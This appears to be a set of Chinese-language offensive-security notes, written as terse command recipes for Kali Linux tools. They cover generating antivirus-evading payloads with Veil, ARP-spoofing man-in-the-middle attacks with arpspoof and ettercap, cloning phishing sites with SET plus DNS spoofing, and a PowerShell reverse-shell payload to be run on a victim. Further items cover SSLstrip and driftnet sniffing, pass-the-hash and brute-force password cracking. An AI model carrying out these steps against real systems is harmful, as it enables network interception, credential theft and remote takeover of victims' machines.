使用Veil Evasion工具生成绕过杀软的攻击载荷。
kali中没有自带需单独安装
apt-get install veil-evasion -y veil
veil Veil >:use Evasion Veil >:list Veil >:use 攻击载荷 Veil >:set LHOST IP地址 Veil >:generate
也可使用命令行模式
veil -t Evasion -p 载荷名称 --ip IP地址 --port 端口号
生成载荷后,本地建立监听器。
没有漏洞可利用时可对模板主机进行欺骗获取网络中传输的数据进行分析常见的是中间人攻击。
多为ARP欺骗冒充网关或其他主机转发流量获取信息和DNS欺骗。
专业ARP欺骗工具可直接欺骗网关。
arpspoof 选项 host
-i 使用的接口-t 目标 制定欺骗的目标;默认为所有主机
-r 双向欺骗与-t一起使用host 拦截包的主机通常是本地网关。 攻击步骤
echo 1 > /proc/sys/net/ipv4/ip_forward ifconfig arp
查看目标系统的IP和ARP缓存表确定攻击机和目标主机没有任何通信此时这两台主机通信就可实施ARP攻击。
arpspoof -i 网口名 -t 目标机 arpspoof -i 网口名 -t 网关 目标机 也可使用一条命令同时进行arp攻击: arpspoof -i 网口名 -t 目标机 -r 网关 arp
ettercap -G
选择Sniff|Unified sniffing #启动嗅探选择接口 选择Hosts|Scan for hosts #启动扫描主机 选择Hosts|Hosts list #查看主机列表 选择两台主机Add to Target1和Target2选择Start|Start sniffing 选择Mitm|ARP poisoning… #启动ARP注入攻击选Sniff remote connections 攻击成功可捕获到数据 选择Start|Stop sniffing #关闭嗅探 选择Mitm|Stop mitm attack(s) #关闭中间人攻击
也可使用命令行模式
ettercap 选项 目标1 目标2
ettercap -Tq -M arp:remote IP1 IP2
利用人性的好奇、信任、贪婪等攻击人自身的弱点。
setoolkit set>1
构造一些具有诱惑力的网页诱导访问。
setoolkit set > 1 set > 2 set:webattack>3 set:webattack>1
输入网站IP地址输入本机kali地址
set:webattack> Select a template:2
成功生成伪造站点此时可结合DNS欺骗Ettercap工具中的dns_spoof插件来诱骗用户到伪站点。
创建一个PowerShell文件发送给目标执行可获取一个反向远程连接。 ①工具菜单选择编号9) Powershell Attack Vectors
set:powershell>1
②设置攻击机IP地址和回连端口,yes开启监听
在/root/.set/reports/powershell/找到x86_powershell_injection.txt文本文件该文件则可运行PowerShell。 ③将文件内容复制到目标机DOS下运行或者后缀改为.bat ④在攻击机查看会话
msf6 > sessions msf6 > sessions -i 会话ID
中间人攻击成功后开启wireshark捕获对应网口的流量。
实施中间人后使用driftnet来捕获图片与Ettercap工具结合使用可捕获目标主机浏览的所有图片。
driftnet -i 网口名称 -d 路径
使用Ettercap实施中间人攻击后即可监听到访问HTTP网站的数据。
使用SSLstrip工具监听HTTPS数据。
Xplico可快速找出用户请求的网页地址、图片和视频等内容。 kali默认未安装。
收集信息并分析创建一个合理的密码字典用于攻击。
相关邮箱、网站博客、文章、单位名称、人员名称、生日信息、名字缩写等。
特定漏洞可直接使用哈希密码值使用exploit/windows/smb/psexec渗透测试模块。
Utilman是windows辅助工具管理没有用户登录也可调用Utilman进程。
控制路由器很容易对连接该路由器主机实施各种数据嗅探和欺骗攻击。
开源暴力密码破解工具可破解FTP、HTTP、IMAP和MYSQL等密码。